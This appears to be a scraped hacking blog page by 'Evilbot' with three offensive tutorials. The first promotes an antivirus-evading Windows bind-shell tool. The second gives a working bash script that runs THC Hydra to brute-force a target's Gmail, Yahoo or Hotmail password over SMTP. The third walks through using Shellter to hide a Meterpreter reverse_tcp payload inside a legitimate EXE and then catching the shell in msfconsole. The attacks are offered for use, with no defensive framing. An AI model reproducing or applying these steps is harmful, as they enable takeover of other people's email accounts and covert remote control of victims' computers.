Bypass Antivirus And Get Bind Shell In Windows




It's a very simple and easy method to get bind shell in any windows with ARCANUS :

Get ARCANUS : https://goo.gl/VTHly8

Watch This Tutorial & Share This With Your Friends ~

 

~ Feel Free To Give Feedback ~

Brute-Force Email Using a Simple Bash Script

Hi my name is Evilbot and I am not a script kiddy brat from Xbox Live asking you how to boot someone offline for being mean to me. I am an amateur white hat hacker hoping to learn and teach.
THC Hydra is very prominent online brute-force tool and has been featured in Null-Byte quite a lot. It is dictionary based, as you will have to provide a wordlist with possible passwords. You can read the README here:https://github.com/vanhauser-thc/thc-hydra
Today ,we will be focusing on brute forcing email, or more specifically, SMTP, also known as the Simple Mail Transfer Protocol. It is your standard protocol for sending electronic mail.
Let's get started!

Step 1Open Up Kali!

Of course, we will be using Kali Linux. I use mine on VMware Workstation, but it won't really matter what you use.


Let's open up Leafpad, or your text editing program of your choice.

Step 2Bash Time!

We're going to write a little bit of script, so that we can save some time instead of going through the hassle of actually typing out parameters.
On Leafpad, type:
#! /bin/bash 
echo Simple Email Cracking Script in bash
echo Written By: Evilbot
echo NOTE: Make sure you have wordlists!
echo Let us Begin:
echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
read smtp
echo Enter Email Address:
read email
echo Provide Directory of Wordlist for Passwords:
read wordlist
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
And after you got it, save it as anything you want, but with .sh at the end. Make sure it is in the root directory. Not on your desktop, but in /root.


Now, I am going to explain how the script works.
#! /bin/bash simply means that everything is in bash.
echo simply means to tell the computer to say something. For example, echo Hello World means to tell the computer to output Hello World.
read is asking for user input. this will then store your input into a variable. read email would mean for you to enter something, and it will be stored into the email.
hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp is the THC Hydra command which will help brute-force the email address. As you may tell, there are some parameters with a $. This is the variable with stored values you previously input in the read command.

Step 3Permissions

We're not done yet! The file you have saved (in root, right?) only has read and write permissions. This means you cannot execute it.
Let's open up Terminal. Type in
chmod a+x yourscript.sh (ofc replace yourscript with the name you actually gave to the bash file)

Step 4Execute!


Now we can finally use it!
In terminal, let's type
./yourscript.sh


 It's working!


The script is self-explanatory. Type in the SMTP service of the target's email, where smtp.gmail.com is Gmail. After that, you provide the gmail account, such as johndoe@gmail.com and give a wordlist directory, which you can find some default ones in the /usr/share/wordlists directory, or you can create your own with Crunch or CUPP.
 Thanks for reading, and please provide some feedback :)
You Can Also Download The Script From Here :)
https://mega.nz/#!r5pWTQRA!MvxfuPWckmsV8AyssMvQ2j038V4EzvjjV1NmId-u0A4
 


 

Create FUD PAYLOAD using Kali linux 2.0 - Shellter


 -= Evilbot =-
                                           -= Creating Fud Backdoor - Shellter -=
                                                -= Kali Linux 2.0 ( Rolling ) =- 

Wine32 Must Be Installed :-
Any Exe File :-
Download Shellter From The Link In Description :-
-------
Here I Have The NoIp ( DUC ) EXE File , Copy The File And Paste It On Shellter Folder
Rename The Exe File With Anything You Want :3

Open The New Terminal And Type > cd Desktop/shellter/  > Hit Enter Button Now
Then Type > ls
Then > wine shellter.exe
Now Type A For Auto Operation
PE Target > noip.exe ( But The Name Of The Downloaded EXE File )
Now Wait 1 min
----
Now After some wait Press N For Stealth mode
Then Press L To Select Payload & Then Press 1 and hit ENTER Button
SET HOST > Your IP
SET LPORT > 8080 ( Default )
Hit Enter Button :3 Injection Verified!
Now Type Clear And Start The Service > service postgresql start
Now Type msfconsole
msf > use exploit/multi/handler
Now > set PAYLOAD windows/meterpreter/reverse_tcp
Then > Set LHOST ( IP )
Then > Set LPORT 8080
Then > exploit -j
----------------

 
Watch The Video And Enjoy :)
Must Like The Video And Subscribe and Share :)